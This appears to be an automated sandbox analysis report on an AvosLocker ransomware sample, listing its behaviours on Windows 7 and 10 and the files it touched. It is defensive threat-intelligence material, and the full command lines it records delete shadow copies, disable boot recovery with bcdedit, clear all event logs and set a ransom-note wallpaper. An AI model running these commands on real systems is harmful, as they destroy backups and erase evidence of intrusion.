Malware Analysis Report

2024-10-16 03:28

Sample ID 230511-s9f6zsad87
Target Avos2.zip
SHA256 1198fb9117776809b11a19000161377384957bee846f7b25a610fc8ca082eb37
Tags
avoslocker evasion ransomware
score
10/10

Analysis Overview

Threat Level: Known bad

The file Avos2.zip was found to be: Known bad.

Malicious Activity Summary

avoslocker evasion ransomware

Avoslocker Ransomware

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-11 15:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-11 15:49

Reported

2023-05-11 15:51

Platform

win7-20230220-en

Max time kernel

73s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\GrantWait.png => C:\Users\Admin\Pictures\GrantWait.png.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\ImportComplete.raw => C:\Users\Admin\Pictures\ImportComplete.raw.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\NewBackup.tiff => C:\Users\Admin\Pictures\NewBackup.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeEdit.tiff => C:\Users\Admin\Pictures\ResumeEdit.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\UnregisterGrant.raw => C:\Users\Admin\Pictures\UnregisterGrant.raw.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Users\Admin\Pictures\NewBackup.tiff C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeEdit.tiff C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\ConvertToSet.raw => C:\Users\Admin\Pictures\ConvertToSet.raw.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1700332598.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1232 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1284 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 908 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1660 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 912 wrote to memory of 2420 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1232 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3060 wrote to memory of 3948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 2528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1700332598.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

\Device\HarddiskVolume1\Boot\GET_YOUR_FILES_BACK.txt

C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt

\??\PIPE\srvsvc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EN5SGQ61K109RTDDN5BS.temp

C:\GET_YOUR_FILES_BACK.txt

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-11 15:49

Reported

2023-05-11 15:52

Platform

win10v2004-20230220-en

Max time kernel

81s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\DisableUpdate.tiff => C:\Users\Admin\Pictures\DisableUpdate.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\DismountConvert.tif => C:\Users\Admin\Pictures\DismountConvert.tif.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Users\Admin\Pictures\GrantRestart.tiff C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\GrantRestart.tiff => C:\Users\Admin\Pictures\GrantRestart.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\RegisterAssert.tif => C:\Users\Admin\Pictures\RegisterAssert.tif.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\SetInitialize.tif => C:\Users\Admin\Pictures\SetInitialize.tif.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Users\Admin\Pictures\DisableUpdate.tiff C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1347122807.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\STRTEDGE.INF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-250.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\nub.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\jre\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\Logo.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTest-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\lib\management\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-24_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\ExcelCapabilities.json C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\PUSH.WAV C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_auditreport_18.svg C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailMediumTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
